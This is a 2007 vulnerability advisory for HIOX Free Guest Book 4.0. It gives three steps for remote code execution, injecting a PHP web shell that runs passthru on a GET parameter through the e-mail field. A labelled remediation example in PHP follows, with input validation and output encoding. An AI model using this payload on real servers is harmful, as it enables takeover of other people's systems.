hgb-exec.txt

2007-04-11T00:00:00
ID PACKETSTORM:55821
Type packetstorm
Reporter Dj7xpl
Modified 2007-04-11T00:00:00

Description

                                        
+========================I=R=A=N============================+  
  
HGB Version 4.0   
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Author :  
  
Dj7xpl / Dj7xpl[at]Yahoo[dot]com  
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Type :  
  
Remote Code Execution Vulnerability  
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Product / Vendor :  
  
HIOX FREE Guest Book  
  
http://www.hscripts.com/scripts/php/guestbook.php  
  
=========================I=R=A=N=============================  
  
+========================I=R=A=N============================+  
  
Bug :  
  
[1] Open Target By Browser  
  
[2] Insert Bad Code In Email E.g : <?php passthru($_GET[cmd]);?>@yahoo.com  
  
[3] See Bad C0de : http://[Target]/[Path]/gb.php E.g : http://dj7xpl.ir/hgb/gb.php?cmd=dir  
  
=========================I=R=A=N=============================  
  
#My proud Iran will remain proud  
#Sp Tnx : str0ke  
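
The steps under "Bug" imply that the e-mail field is stored unfiltered in a file the server interprets as PHP (gb.php). The following is an added example of a hardened submit/render path, not code from the advisory or from the HIOX script; the function names and the data-file path are hypothetical, and it assumes PHP 7.4 or later.

```php
<?php
// Added example, not HIOX code. Function names and GB_DATA_FILE are hypothetical.
// Entries go to a data file kept outside the set of files executed as PHP.
const GB_DATA_FILE = __DIR__ . '/data/entries.jsonl'; // assumed path; directory must exist

/** Return the validated address, or null when the input is not a plain e-mail. */
function gb_clean_email(string $raw): ?string
{
    $email = trim($raw);
    if (strlen($email) > 254) {
        return null;
    }
    // '<', '>', '(', ')', ';', '[' and ']' are not valid in an unquoted local part,
    // so the value from step [2] fails validation here.
    $ok = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}

/** Append one entry as a JSON line; returns false if the entry is rejected. */
function gb_store_entry(string $name, string $email, string $message): bool
{
    $clean = gb_clean_email($email);
    if ($clean === null) {
        return false;
    }
    // JSON_HEX_TAG writes '<' and '>' as \u003C / \u003E, so no stored field
    // (name and message included) can contain a literal "<?" opening tag.
    $line = json_encode(
        ['name' => $name, 'email' => $clean, 'message' => $message, 'time' => time()],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    if ($line === false) {
        return false; // e.g. invalid UTF-8 in a field
    }
    return file_put_contents(GB_DATA_FILE, $line . "\n", FILE_APPEND | LOCK_EX) !== false;
}

/** Render one decoded entry; every field is HTML-encoded on output. */
function gb_render_entry(array $e): string
{
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p><b>' . $h($e['name']) . '</b> &lt;' . $h($e['email']) . '&gt;<br>'
         . nl2br($h($e['message'])) . '</p>';
}

// Constructed sample input: the e-mail value quoted in step [2], then a normal address.
var_dump(gb_clean_email('<?php passthru($_GET[cmd]);?>@yahoo.com'));
var_dump(gb_clean_email('visitor@example.com'));
```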
  
  